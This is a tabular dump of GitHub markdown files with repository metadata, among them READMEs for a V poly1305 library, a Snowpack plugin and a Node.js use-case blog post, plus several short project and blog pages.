hexsha
stringlengths
40
40
size
int64
5
1.04M
ext
stringclasses
6 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
344
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
11
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
344
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
11
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
344
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
11
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
1.04M
avg_line_length
float64
1.14
851k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
lid
stringclasses
191 values
lid_prob
float64
0.01
1
4be492b1b258068aa0ed63ac29781b690543db64
2,606
md
Markdown
README.md
blackshirt/poly1305
d38f6905da0a49cff7798ee130abdde28c83ad37
[ "MIT" ]
2
2022-03-12T23:30:34.000Z
2022-03-14T01:17:55.000Z
README.md
blackshirt/poly1305
d38f6905da0a49cff7798ee130abdde28c83ad37
[ "MIT" ]
null
null
null
README.md
blackshirt/poly1305
d38f6905da0a49cff7798ee130abdde28c83ad37
[ "MIT" ]
null
null
null
# poly1305 Poly1305 is a one-time authenticator originally designed by D. J. Bernstein. Poly1305 takes a 32-byte one-time key and a message and produces a 16-byte tag. It can be used to verify the data integrity and the authenticity of a message. This module provide `poly1305` message authentication code (MAC) for V Language. As a note, <b>a key must only be used for a single message</b>. Authenticating two different messages with the same key allows an attacker to forge authenticators for other messages with the same key. ## Installation You can install this module from github. ```bash v install https://github.com/blackshirt/poly1305 ``` ## Usage 1. Provide your secret keys with length 32 bytes, you can generate its randomly from `crypto.rand` or you can use `chacha20.otk_key_gen()` for generating one-time key intended for poly1305 keygen. If you want to use `chacha20.otk_key_gen()` function, you should install `chacha20` module to your path. Its available at [chacha20](https://github.com/blackshirt/chacha20) 2. If you would use `chacha20.otk_key_gen` provide its with nonce bytes, with length 12 or 24 bytes. 3. And then generates one-time key with `chacha20.otk_key_gen`. 4. Create Poly1305 mac instance with generated one-time key. If you are not going to use `chacha20.otk_key_gen` to generate key, make sure your key random enought to create poly1305 (feeds it with `crypto.rand`) 5. feeds your poly1305 instance with messages you want to be authenticated by calling `write` method. 6. And then, call finalize to produce your 16 byte tag associated with your messages. ```V module main import crypto.rand import blackshirt.chacha20 import blackshirt.poly1305 fn main() { // messages to auth msg := 'Hello my Girls.....!!'.bytes() // provides key with length 32 bytes key := rand.read(32) ? // provides your nonce with length 12 or 24 bytes nonce := rand.read(12) ? // and then create one-time key for poly1305 otk := chacha20.otk_key_gen(key, nonce) // create new poly305 mac mut poly := poly1305.new_with_key(otk) ? // or if you dont want using `chacha20.otk_key_gen`, you can directly // using key to instantiate poly1305 mac // mut poly := poly1305.new_with_key(key) ? // write message to mac poly.write(msg) // and then call finalize to produce 16 byte tag tag := poly.finalize() res := poly1305.verify_mac(tag, msg, otk) ? if res { println('Verified') } else { println('Not verified') } } ``` ## License [MIT](https://choosealicense.com/licenses/mit/)
32.17284
211
0.72218
eng_Latn
0.993029
4be5114dfc08a8656dd352bc6bb7fe5f322740d8
1,162
md
Markdown
utils/README.md
EmeraldAGreen/readme-generator
0c21d3bce74bcacaf4e4fb9ec55acef03f3a6e2c
[ "MIT" ]
null
null
null
utils/README.md
EmeraldAGreen/readme-generator
0c21d3bce74bcacaf4e4fb9ec55acef03f3a6e2c
[ "MIT" ]
null
null
null
utils/README.md
EmeraldAGreen/readme-generator
0c21d3bce74bcacaf4e4fb9ec55acef03f3a6e2c
[ "MIT" ]
null
null
null
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) # README Generator ## Description This is a command line application to generate a README.md file. The README includes a place for users to describe their app, how to use it, how to install it, report, issues, make, contributions, and contact information. ## Table of Contents * [Installation](#installation) * [Usage](#usage) * [License](#license) * [Contribution](#contribution) * [Tests](#tests) * [Questions](#questions) ## Installation Install node.js, then open an integrated terminal in your coding application. Enter "node index.js" in the command line to start the application. ## Usage Answer the prompts, and a README.md file will be generated. ## License This project is licensed under MIT. Read more about [MIT](https://opensource.org/licenses/MIT). ## Contribution Please contact me via the email below to report bugs or suggest enhancements. ## Tests Use node.js to run unit tests. ## Questions Find me on Github: [EmeraldAGreen](https://github.com/EmeraldAGreen) Email me with additional questions: egreengirl1@gmail.com
31.405405
221
0.752151
eng_Latn
0.931112
4be5ac04db304076dc758ab0eadb170542168324
36
md
Markdown
README.md
Karstagg/chat-test
d5ee518aa5f755630301e43008afcdb585624fb2
[ "Apache-2.0" ]
null
null
null
README.md
Karstagg/chat-test
d5ee518aa5f755630301e43008afcdb585624fb2
[ "Apache-2.0" ]
null
null
null
README.md
Karstagg/chat-test
d5ee518aa5f755630301e43008afcdb585624fb2
[ "Apache-2.0" ]
null
null
null
# chat-test building a pusher chat
12
23
0.75
eng_Latn
0.99078
4be5ad1d0ccddedb0adf174d08b6b2761549cf0d
368
md
Markdown
.original/j-Sticker/readme.md
skylarkui/skylark-totaljs-components
1cc115da3264668d4d0f75ac4965fa8cc5b87367
[ "MIT" ]
null
null
null
.original/j-Sticker/readme.md
skylarkui/skylark-totaljs-components
1cc115da3264668d4d0f75ac4965fa8cc5b87367
[ "MIT" ]
null
null
null
.original/j-Sticker/readme.md
skylarkui/skylark-totaljs-components
1cc115da3264668d4d0f75ac4965fa8cc5b87367
[ "MIT" ]
null
null
null
## j-Sticker __Configuration__: Example: `data-jc-config="on:fixed;off:relative"` `on` {String} this class is enabled when the `scroll top` position is greater than this element `Y` position `off` {String} this class is enabled when the `scroll top` position is smaller than this element `Y` position ### Author - Peter Širka <petersirka@gmail.com> - License: MIT
28.307692
109
0.741848
eng_Latn
0.984175
4be5f73fe8f449419395255af066e4c6f5749e91
95
md
Markdown
source/faq.md
furturexx/wulaphp.com
f3d49d4240c64ec7392c39d7254a5369164a9445
[ "MIT" ]
null
null
null
source/faq.md
furturexx/wulaphp.com
f3d49d4240c64ec7392c39d7254a5369164a9445
[ "MIT" ]
null
null
null
source/faq.md
furturexx/wulaphp.com
f3d49d4240c64ec7392c39d7254a5369164a9445
[ "MIT" ]
null
null
null
--- title: 常见问题 type: guide order: 50000 --- ## 配置相关 ## 数据库相关 ## 模块相关 ## 路由相关 ## 插件(扩展)相关
5.9375
12
0.536842
eng_Latn
0.179209
4be6129514c891fb7a1fc39c619ae039796dada7
1,349
md
Markdown
packages/@snowpack/plugin-build-script/README.md
davidleger95/snowpack
910fd3c96cd36cd1268e9294391e191037c458c4
[ "MIT" ]
null
null
null
packages/@snowpack/plugin-build-script/README.md
davidleger95/snowpack
910fd3c96cd36cd1268e9294391e191037c458c4
[ "MIT" ]
null
null
null
packages/@snowpack/plugin-build-script/README.md
davidleger95/snowpack
910fd3c96cd36cd1268e9294391e191037c458c4
[ "MIT" ]
null
null
null
# @snowpack/plugin-build-script A Snowpack plugin to build files in your application using any CLI tool. This plugin passes matching files as input to a custom CLI command, and returns the output response as the build result. This is useful for connecting a custom CLI or when no Snowpack plugin exists for a favorite build tool. Note: All Snowpack < v2.6 `build:*` scripts now use this plugin behind the scenes. Usage: ```bash npm install @snowpack/plugin-build-script ``` Then add the plugin to your Snowpack config: ```js // snowpack.config.js module.exports = { plugins: [ [ '@snowpack/plugin-build-script', { input: ['.tsx'], // files to watch output: ['.tsx'], // files to export cmd: 'babel --filename $FILE', // cmd to run } ] ] } ``` ## Plugin Options | Name | Type | Description | |:---------|:-----------:|:----------------------------------------------------------------------------| | `input` | `string[]` | Array of extensions to watch for. | | `output` | `string[]` | Array of extensions this plugin will output. | | `cmd` | `string` | Command to run on every file matching `input`. Accepts the `$FILE` env var. |
34.589744
297
0.536694
eng_Latn
0.919283
4be651a7d06441fb57fe38ef437a2a8dad304820
1,694
md
Markdown
content/momentum/web-momo4/download_bundle.md
ahdvnd/developers.sparkpost.com
ff60f1f534d1bcf3b7bc85a6db58be2cf22978c3
[ "MIT" ]
null
null
null
content/momentum/web-momo4/download_bundle.md
ahdvnd/developers.sparkpost.com
ff60f1f534d1bcf3b7bc85a6db58be2cf22978c3
[ "MIT" ]
null
null
null
content/momentum/web-momo4/download_bundle.md
ahdvnd/developers.sparkpost.com
ff60f1f534d1bcf3b7bc85a6db58be2cf22978c3
[ "MIT" ]
null
null
null
| | | | | --- | --- | --- | | [Prev](byb.analytics_reqs)  | Part II. Installing Momentum |  [Next](install_upgrade_packages) | ## Chapter 7. Download the Software Bundle and Prepare Whether you intend to perform a **new install** or an **upgrade** you need to download the software bundle **on all nodes** . 1. Download the appropriate Momentum software bundle from the [Message Systems Support website](https://support.messagesystems.com/start) for every node that you will install or upgrade. 2. Copy the bundle to the `/var/tmp` directory on each of the nodes. **NOTE:** Here, and throughout the installation documentation, specific releases and revisions shown are just examples, and your appropriate Momentum software bundle will be different. `cp momentum-bundle-4.2.1.50062.rhel6.x86_64.tar.gz /var/tmp/` 3. Unpack the tarball on each node, set the repository directory, and create a "convenience file". ``` cd /var/tmp tar -zxf momentum-bundle-4.2.1.50062.rhel6.x86_64.tar.gz cd momentum-4.2.1.50062/ ./setrepodir pwd >/var/tmp/inst.dir ``` 4. Confirm your valid Momentum `license` file is in the `/opt/msys/ecelerity/etc` folder on each MTA node. Your licenses should be pulled automatically once they have been issued. If your node does not have public internet access during installation, you will need to add your valid Momentum `license` files manually. | | | | | --- | --- | --- | | [Prev](byb.analytics_reqs)  | [Up](p.installing) |  [Next](install_upgrade_packages) | | 6.18. Verifying Analytics Node Requirements  | [Table of Contents](index) |  Chapter 8. Install / Upgrade the Packages |
48.4
188
0.700708
eng_Latn
0.969328
4be81d8aa53bd0536e07695d2e68061f930da708
949
md
Markdown
AUTHORS.md
pelya/transistor
67d17257892c4d3438c3e230d9fadb57875f3f54
[ "MIT" ]
null
null
null
AUTHORS.md
pelya/transistor
67d17257892c4d3438c3e230d9fadb57875f3f54
[ "MIT" ]
null
null
null
AUTHORS.md
pelya/transistor
67d17257892c4d3438c3e230d9fadb57875f3f54
[ "MIT" ]
null
null
null
AUTHORS ======= ### Development Transistor is designed, developed and maintained by: [y20k](https://github.com/y20k) Contributing developer(s): [azixMcAze](https://github.com/azixMcAze) & [meonwax](https://github.com/meonwax) ### Translations Catalan version: [Zagur](https://github.com/Zagur) Chinese version: [YFdyh000](https://github.com/yfdyh000) French version: [M2ck](https://github.com/M2ck) German version: [y20k](https://github.com/y20k) Japanese version: [naofum](https://github.com/naofum) Russian version: [Boris Timofeev](https://github.com/btimofeev) Serbian version: [pejakm](https://github.com/pejakm) Slovenian version: [bungabunga](https://github.com/bungabunga) Spanish version: [franciscot](https://github.com/franciscot) Ukrainian version: [burunduk](https://github.com/burunduk) ### Want to help? Please check out the notes in [CONTRIBUTE.md](https://github.com/y20k/transistor/blob/master/CONTRIBUTE.md) first.
29.65625
114
0.743941
yue_Hant
0.351481
4be84803fafc53a4a30f42ddcb655dbc9e9186b5
706
md
Markdown
readme.md
Queen-01/Hero-Squad
8a5b180292ebdafe2740085ab75f17c622c89683
[ "MIT" ]
1
2021-08-04T21:44:35.000Z
2021-08-04T21:44:35.000Z
readme.md
Queen-01/Hero-Squad
8a5b180292ebdafe2740085ab75f17c622c89683
[ "MIT" ]
null
null
null
readme.md
Queen-01/Hero-Squad
8a5b180292ebdafe2740085ab75f17c622c89683
[ "MIT" ]
null
null
null
# Project Name. HERO SQUAD. ## AUTHOR. Quienzy Ong'eye ## Description. The project is a Java web application built with the spark framework whereby a person is able to view their favourite heroes and also get to create their own. ### Project SetUp. 1. Fork this repository. 2. Clone this repository onto your local machine through use of the command git clone <Forked-repository-link.>. 3. Navigate to your terminal. 4. Navigate the the appropriate directory by use of cd command cd<root-folder>. ### Technologies Used. 1. Java 2. Handlebars 3. CSS 4. Spark 5. jUnit ### Live Site View [LIVE] (https://github.com/Queen-01/Hero-Squad.git) ### License This project is under the [MIT](License) license
25.214286
158
0.747875
eng_Latn
0.990791
4be8744985f3485a4f011401b0d4014a97e576ca
1,346
md
Markdown
website/content/events/twitch-snapchat-suspend-trump/index.md
steverusso/bigtech.fail
0ca3853f04149237d1138d2a5c4a443680da0eef
[ "Unlicense" ]
5
2020-06-02T00:13:25.000Z
2021-08-02T21:32:41.000Z
website/content/events/twitch-snapchat-suspend-trump/index.md
steverusso/bigtech.fail
0ca3853f04149237d1138d2a5c4a443680da0eef
[ "Unlicense" ]
203
2020-05-18T23:43:17.000Z
2022-02-04T19:40:45.000Z
website/content/events/twitch-snapchat-suspend-trump/index.md
steverusso/bigtech.fail
0ca3853f04149237d1138d2a5c4a443680da0eef
[ "Unlicense" ]
null
null
null
--- title: Twitch & Snapchat Suspend President Trump date: 2021-01-07 image: /img/people/trump.jpg corpos: [ twitch, snapchat ] tags: [ suspended, gov, election2020, capitol-riot ] sources: - [ 'Reclaim The Net "Snapchat and Twitch disable President Trump’s accounts" by Christina Maas (7 Jan 2021)', 'reclaimthenet.org/snapchat-and-twitch-disable-president-trumps-accounts/' ] - [ 'The Federalist "Snapchat Joins Big Tech Censorship Campaign To Ban President Trump" by Jordan Davidson (7 Jan 2021)', 'thefederalist.com/2021/01/07/snapchat-joins-big-tech-censorship-campaign-to-ban-president-trump/' ] - [ 'Newsmax "Twitch, Snapchat Suspend Trump Indefinitely" by Theodore Bunker (7 Jan 2021)', 'archive.is/nlQec' ] --- Twitch and Snapchat disabled President Trump's accounts one day after [Facebook and Twitter suspended him](/e/twitter-facebook-suspend-trump/). A spokesperson for Snapchat confirmed that the corporation locked President Trump's account. A spokesperson for Twitch gave the following statement: > In light of yesterday’s shocking attack on the Capitol, we have disabled > President Trump’s Twitch channel. Given the current extraordinary > circumstances and the President’s incendiary rhetoric, we believe this is a > necessary step to protect our community and prevent Twitch from being used to > incite further violence.
58.521739
224
0.780832
eng_Latn
0.967001
4be89e5248a4b1fccc5662afedde277c6e891774
653
md
Markdown
_posts/2018/2018-12-08-congratulations-graduates.md
uidaholib/spec-lumber
9b498e1b336fe8169f899841d6314d338e987628
[ "MIT" ]
1
2021-02-25T17:25:39.000Z
2021-02-25T17:25:39.000Z
_posts/2018/2018-12-08-congratulations-graduates.md
uidaholib/spec-lumber
9b498e1b336fe8169f899841d6314d338e987628
[ "MIT" ]
7
2020-12-10T01:16:56.000Z
2021-05-21T00:12:23.000Z
_posts/2018/2018-12-08-congratulations-graduates.md
uidaholib/spec-lumber
9b498e1b336fe8169f899841d6314d338e987628
[ "MIT" ]
1
2021-05-20T18:34:34.000Z
2021-05-20T18:34:34.000Z
--- title: Congratulations, Graduates date: 2018-12-08 tags: ["graduation","commencement","alumni"] subtitle: cover-image: lumber270 categories: [] --- {% include feature/image.html objectid="lumber270" %} University of Idaho Library Special Collections and Archives congratulates the 578 Vandals receiving degrees during Fall commencement ceremonies today in the ASUI Kibbie Activity Center. Ceremonies past, like one pictured here in 1961, saw graduates don their regalia and process into Memorial Gymnasium for the ceremony. Anyone unable to attend may watch the [proceedings online](https://www.uidaho.edu/news/ui-live). # Sources PG 2-109-103
36.277778
321
0.785605
eng_Latn
0.891679
4be8a740ecadabe3338f2bec7e949d5befc68476
14,409
md
Markdown
.history/_posts/webdevelopment/2019-10-15-NodejsUsecase1_20200303125035.md
girishgodage/girishgodage.github.io
efb0c2974ec93fcad06744522bc1be7f92b0d26c
[ "MIT" ]
2
2020-05-31T09:44:14.000Z
2020-09-08T11:39:08.000Z
.history/_posts/webdevelopment/2019-10-15-NodejsUsecase1_20200303125035.md
girishgodage/girishgodage.github.io
efb0c2974ec93fcad06744522bc1be7f92b0d26c
[ "MIT" ]
1
2021-07-29T06:21:06.000Z
2021-07-29T06:21:06.000Z
.history/_posts/webdevelopment/2019-10-15-NodejsUsecase1_20200303125035.md
girishgodage/girishgodage.github.io
efb0c2974ec93fcad06744522bc1be7f92b0d26c
[ "MIT" ]
null
null
null
--- title: When & How Node.JS Should be Used? date: 2019-10-15 10:41:00 Z permalink: "/blog/nodejs-use-case" categories: - Web Development tags: - learning summary: If Node.js has ever been on your mind –– or you’ve recently started learning it –– you might be asking yourself :- where can I use Node.js? If the stats are to be believed, among three in four software engineers incorporate node either in the full stack or in the backend. With the thumping majority of apps using the popular JS run-time environment, it’s a great opportunity to understand all existing Node.js use case and implement it in your organization. image: "/img/sw_design.png" author: Girish Godage layout: posts prevurl: '' nexturl: '' discussion_id: 2020-01-07-Nodejsusecase --- ## When & How Node.JS Should be Used ? If Node.js has ever been on your mind –– or you’ve recently started learning it –– you might be asking yourself: where can I use Node.js? If the stats are to be believed, among three in four software engineers incorporate node either in the full stack or in the backend. With the thumping majority of apps using the popular JS run-time environment, it’s a great opportunity to understand all existing Node.js use case and implement it in your organization. ![image info](/img/webdevelopment/2/NodeJS-Use-Cases-Cover-Image.png) So you are starting your next project, and you have decided to use Node.js. Well, what this means for you is to first thoroughly read the documentation and then to ask around in the community that uses Node.js. But here’s the catch –– thanks to its countless use cases, researching Node.js inevitably proves to be tedious and time consuming. And you realise, a little too late, that you’ve signed-up for a never-ending research loop. The way out of this loop lies in understanding the Node.js use case like –– * Leverage data streaming with Node.js * Implementing web-scraping with Node.js * Building a proxy-server using Node.js So, why use Node.js, you ask? ### TL;DR #### Key points addressed in this article * Node.js – What is it used for? * Node.js Usage: How the best use case of Node.js are categorized * Node.js use case Infographic * 10 Industries that can leverage their business with these use cases * When should you not use Node.js? * ### Node.JS – What is it used for? Built on ***Chrome’s V8 JavaScript engine***, Node.js is an asynchronous event-driven JavaScript runtime. By using the event-callback/non-blocking approach, Node.js offers a single-threaded event-io model that allows orchestration of tasks running in parallel. It supports multiple connections without a need for a large memory footprint. The usage of Node.js is not only limited to building web applications, but also for implementing various kinds of services. * Backends and servers * Frontends * Developing API * Microservices * Scripting and automation Now that we know about some uses of Node.js, let’s understand how these uses are categorized. ### Node.js Usage: How the best use case of Node.js are categorized We analyzed 10 industries that use Node.js in their tech stack and classified them into different categories. The loyalty matrix attached below is the result of our analysis as to how often Node.js gets used category wise and what’s the retention percentage of these categories. ![image info](/img/webdevelopment/2/Loyalty-Matrix-by-Node.js-Categories-.png) Quadrant I includes categories that are most frequently used and to which Industries are leveraging them over time. Not surprisingly, Data streaming, Chatbots, and real-time data fall within this quadrant. Industries use Node.js for these categories every day, many times a day. Quadrant II consists of categories that are used intensely, but for finite periods of time. Web scraping falls within quadrant II, along with server-side proxy and a system monitoring dashboard. Although these categories are used by Industries in an intensive manner, the retention over a period of time is less than those falling in Quadrant I. Quadrant III is made up of categories that have low retention and infrequent use. However, the use of Node.js in these categories is expected to increase in the upcoming years. Needless to say, Big-data and IoT technology fall in this quadrant. Quadrant IV comprises of categories that have a low frequency of use, but a loyal Industry base. The categories like REST API, Queued I/O Inputs, and command-line apps fall in the category. Let’s cover these categories one-by-one. ## 1. Data Streaming ### The Problem **Streaming data in web require heavy processing** Data streaming is a complex process because it requires a continuous stream of data to be generated by an array of different sources and devices, delivered in a wide myriad of formats. ### The Solution **Node.js streams make data-streaming easier than ever** In traditional Media streaming, HTTP requests and responses are treated like isolated events; however, in reality, they are streams. Node.js can be used to build some cool data streaming features where files can still be processed while they’re being uploaded. This is possible because data comes in through a stream and can be processed online without being interrupted. *For instance: real-time audio or video encoding is possible, particularly with the JavaScript library such as Node. Media and Entertainment is such an industry where Node.js can be utilized in Data streaming.* ## 2. Server-side proxy ### The Problem **Third-party proxies can cause troubles in building complex web-apps** Third-party proxy services such as Nginx and HAProxy are sometimes not feasible and scalable in handling multiple requests from various sources at a time. ### The Solution **Node.js makes it easier to build a proxy server** While third-party proxy services such as Nginx or HAProxy are affordable, they can add to severe complexity when used for building large scale websites. Node.js can be easily employed as a server-side proxy for collecting data from various third-party resources. Whether you are building a news websites such as BBC, a media website such as Forbes, and entertainment websites such as IMDb, you would want to load content from various third-party domains. Node.js is beneficial for proxying different services with different response times. When used as a server-side proxy, it is capable of handling a large number of simultaneous connections in a non-blocking manner. *For instance: consider a website such as BBC news communicating with various third-party resources, gathering data from different sources, or storing assets like images and videos to third-party cloud services*. ## 3. Big Data and Analytics ### The Problem **Dealing with large data in a browser is troublesome** If you are trying to deal with larger data in the browser, then it might wait for your users for a long time. Any user does not like to wait for more than 5 minutes with a frozen browser, no matter how cool the analysis might be. ### The Solution **Node.js back pressuring makes data processing easier** Node.js streams allow to effectively have a pipeline from which data starts at one point and flows through until the end. To overcome the problem of dealing with larger data, it is important to have a mechanism for breaking the large data into multiple chunks. Using back pressuring, which comes from implementing Node.js, you can use a computer’s resources while processing very large sets of data. ## 4. Wireless Connectivity ### The Problem **Bandwidth consumption and bi-directional signaling** Bandwidth consumption is a major challenge for IoT connectivity. For collecting and routing data between devices, reliable bidirectional signaling is essential. This is a challenge as it requires a reliable server to collect the data and send it to a particular destination. ### Solution **Node.js server ensures data connectivity without any request blockage** Node.js is the best solution to create a proxy server for data connectivity and routing as it supports I/O connectivity without blocking. Some JavaScript libraries for Node.Js such as Node-Red, NodeMcu, and Node Serialport offer ready-made solutions for connecting IoT devices. ## 5. System Monitoring Dashboard ### The Problem **Pushing real-time data at scale can be inconvenient** Dashboards are meant to convey a large amount of information quickly, however, finding the relevant information and displaying it in real-time is difficult. While using a dashboard to respond to errors, there are high chances for you to encounter several problems like: * You won’t be automatically notified of unusual behavior. * You’ll need to monitor the dashboard to detect potential errors continuously. ### The Solution **Pushing data in real-time with Node.JS is easy** Using the advance capability of event loop in Node.js, you can build a powerful web-based dashboard that validates the status of all services in an asynchronous manner. The data can be pushed in real-time to clients using WebSockets. By using Node.js, both internal (intra-company) and public services’ statuses can be reported live. For instance, you can build a dashboard to monitor real-time data which runs on frameworks backed by Node.js and Websocket instead of Java or Java Applets. 6. Real-time Data The Problem Scalability bottlenecks in real-time data is very common The common real-time data streaming issues are sizing and scaling. If your web app is running live 24 x 7, there is a need to plan out extra resources to execute all the operations without failing to meet any service-level agreements. The Solution Node.JS makes real-time data a boon for web apps Node.js is a good fit for building real-time web apps by using push technology over web sockets (a two-way communication between the servers and clients). What’s more revolutionary about Node.js is that it is the best choice for creating server-side web apps. Let’s walk you through a few reasons as to why it is pivotal to choose Node.js for building real-time web apps: Sharing & Reusing: It lets developers share the package of library code. I/O Bound: Node.js handles I/O bound tasks effectively. Fast & Scalable: In real-time web apps, it is possible to handle the multi-users requests due to the single-threaded model of Node.js. The collaborative web apps (Trello, Google Docs), live chat, instant messaging, and online gaming are examples of real-time apps that benefit from Node.js architecture. These apps do function within a time frame that the users recognize as immediate and current. 7. Queued I/ O Inputs The Problem An app database can be crashed with huge data load Receiving a high amount of concurrent data can make database congested and resulting in the crash of the application. Also, it becomes expensive to queue data and maintain concurrency because of huge data load. The Solution The asynchronous nature of Node.js makes it capable of handling huge data load Due to the asynchronous capability and event-driven architecture, Node.js excels in handling huge data load. What’s more, the data can be queued through caching or messaging queuing infrastructure such as RabbitMQ or ZeroMQ and stored in different database batch-write process. 8. Chatbots The Problem For businesses, investment in customer service calls is costly A typical business spends $1.3 trillion on 265 billion customer service calls each year. Moreover, 265 billion customer support requests are made every year, which costs businesses a whopping $1.3 trillion to service them. That’s a huge cost considering the revenue made by these businesses is not constant. The Solution Chatbots can offer better customer service experience at a lower cost Building chatbots with Node.js is a perfect solution because you can build a simple API quickly with hapi.js, Express, etc as it supports real-time messages (RTM) or Slack RTM bots. Facebook has built a sample chatbot with Node.js, which is available on Github. Drift (conversion-driven marketing and sales platform) is another example of chatbot that connects businesses with the best leads. Drift lets users to directly message them within the browser or provide them an automated chat experience. 9. Web Scraping & Automation The Problem Manual data extraction is a cumbersome process Extracting millions of data from different website sources is not possible manually. Furthermore, data analytics often gets challenging to implement in this case, considering the amount of data required to push through the stream. The Solution Data scraping with Node.js is a cheaper alternative An automated way of collecting information or extracted data from websites called as data scraping. Node.js embraces a vast library of packages that simplify tasks such as web scraping. For web scraping, there are mainly two packages used i.e., request and cheerio in Node.js. The request package is used for downloading web pages. On the other hand, cheerio generates a DOM (Document Object Model) tree and provides a subset of jQuery function set to manipulate it. 10. REST API The Problem SOAP makes API Integration a complex process Although SOAP (Simple Object Access Protocol) has a high capacity of data transfer, API integration with it becomes very complex. The Solution Building REST API with Node.js speeds up the API Integration process The trendiest usage of Node.js also covers building RESTful APIs for API Integration. REST APIs, which can be developed using Express.js in Node, is commonly used in enterprise software development project. Moreover, the current trend of microservices design patterns has made the use of RESTful APIs even more common. 11. Command-line Another area where Node.js excels is developing command-line apps. You must be wondering why should we choose Node.js to build command-line apps? The main reason is the strong Node.js ecosystem means that the hundreds of thousands of packages are available for all purposes. They are specifically designed to help build powerful command-line tools. Building command-line apps with Node.js is simple, fast, and extremely cost-effective, thanks to the libraries like commander, yargs, and oclif. Node.js empowers developers who are not familiar with backend languages to use JavaScript outside the web and build diverse work automation solutions.
69.946602
669
0.793879
eng_Latn
0.999219
4be8a993ebe139721f614115bb566147ce7bd665
1,860
md
Markdown
applications/cli/example-python/tfrecord_batch_prediction/README.md
nparkstar/nauta
1bda575a01f782d1dc2cd5221122651f184f7167
[ "Apache-2.0" ]
390
2019-01-23T09:07:00.000Z
2022-02-20T04:03:34.000Z
applications/cli/example-python/tfrecord_batch_prediction/README.md
nparkstar/nauta
1bda575a01f782d1dc2cd5221122651f184f7167
[ "Apache-2.0" ]
52
2019-01-31T12:17:30.000Z
2022-02-10T00:01:39.000Z
applications/cli/example-python/tfrecord_batch_prediction/README.md
nparkstar/nauta
1bda575a01f782d1dc2cd5221122651f184f7167
[ "Apache-2.0" ]
66
2019-01-23T18:59:39.000Z
2020-10-18T15:24:00.000Z
# Batch prediction with files in TFRecords format By default batch prediction functionality provided by nauta system uses files in the protocolbuffer format as a source of data used in prediction. The system however has also option allowing users to pass data in TFRecords format. To make the system accept this format, the following things have to be done: 1) a user must prepare a file in TFRecords format according to the following rules: a) each item to be predicted should contain data in protocolbuffer format - this data should be put into the TFRecords data as _data_pb_ feature b) if there is such need - a user can add label to each item as a _label_ feature. Value of this feature should be _utf_8_ encoded. 2) batch prediction session should be run with -tf/--tf_record option - -d/--data parameter should point out the file in TFRecords format Results of a batch prediction session that uses TFRecords format are files with results - one file for each input TFRecords file. An output file is a serialized (using Python pickle package) list of dictionary item where each item contains two keys: - label - containing label describing the result. If label was passed in TFRecord file - this label is stored here. If there was no label - ouptut label is created as a concatenation of an input filename (without extension) and a consecutive number of a current item. - data - output in protocolbuffer format Name of an output filename is an input filename (without extension) extended with _.result_ extension. Example code that converts files in protocolbuffer format to TFRecords is can be found in tfrecords_converter.py file. This code converts all files from a folder given as a _--input_dir_ folder to one file in TFRecords format. Converter uses filenames as labels. File generated by this script is saved to _--output_file_ location.
74.4
119
0.8
eng_Latn
0.999529
4be90a627d25e4779d3dab3ab95345abadb710ed
498
md
Markdown
posts/post-564.md
chrisnager/give-n-go
0f902c8fdd94adcb87466f35ef7ccd8f840df946
[ "Unlicense", "MIT" ]
1
2019-04-30T22:52:40.000Z
2019-04-30T22:52:40.000Z
posts/post-564.md
chrisnager/give-n-go
0f902c8fdd94adcb87466f35ef7ccd8f840df946
[ "Unlicense", "MIT" ]
null
null
null
posts/post-564.md
chrisnager/give-n-go
0f902c8fdd94adcb87466f35ef7ccd8f840df946
[ "Unlicense", "MIT" ]
null
null
null
--- type: photo state: queue source: https://d13yacurqjgara.cloudfront.net/users/515801/screenshots/1957573/2.gif link: https://dribbble.com/shots/1957573-Cruisin id: '112720899287' --- <p data-height="332" data-theme-id="6516" data-slug-hash="YPjEZw" data-default-tab="result" data-user="yy" class='codepen'><a href='http://codepen.io/yy/pen/YPjEZw/'>Cruisin'</a> by Yusuf (<a href='http://codepen.io/yy'>@YusufYILDIZ18</a>) on <a href='http://codepen.io'>CodePen</a> and Dribbble inspiration</p>
55.333333
311
0.7249
yue_Hant
0.441631
4be971a7e3b0e100265ac270c179ffd243f6dad5
27
md
Markdown
README.md
EnzoMuhlinghaus/Kidiloc
b317f29e949cb8e0b31ac14228b806860ec4c7fe
[ "MIT" ]
null
null
null
README.md
EnzoMuhlinghaus/Kidiloc
b317f29e949cb8e0b31ac14228b806860ec4c7fe
[ "MIT" ]
null
null
null
README.md
EnzoMuhlinghaus/Kidiloc
b317f29e949cb8e0b31ac14228b806860ec4c7fe
[ "MIT" ]
null
null
null
# Kidiloc Training Laravel
9
16
0.814815
eng_Latn
0.831325
4beab78a7d4cb0ac44217939bb9d9c273f4af73d
746
md
Markdown
_posts/2017/2017-01-29-suppresswarning.md
sonpro/sonpro.github.io
ea7914b7b4bcbfc742b9a177e3e3d456e3de655d
[ "MIT" ]
null
null
null
_posts/2017/2017-01-29-suppresswarning.md
sonpro/sonpro.github.io
ea7914b7b4bcbfc742b9a177e3e3d456e3de655d
[ "MIT" ]
null
null
null
_posts/2017/2017-01-29-suppresswarning.md
sonpro/sonpro.github.io
ea7914b7b4bcbfc742b9a177e3e3d456e3de655d
[ "MIT" ]
null
null
null
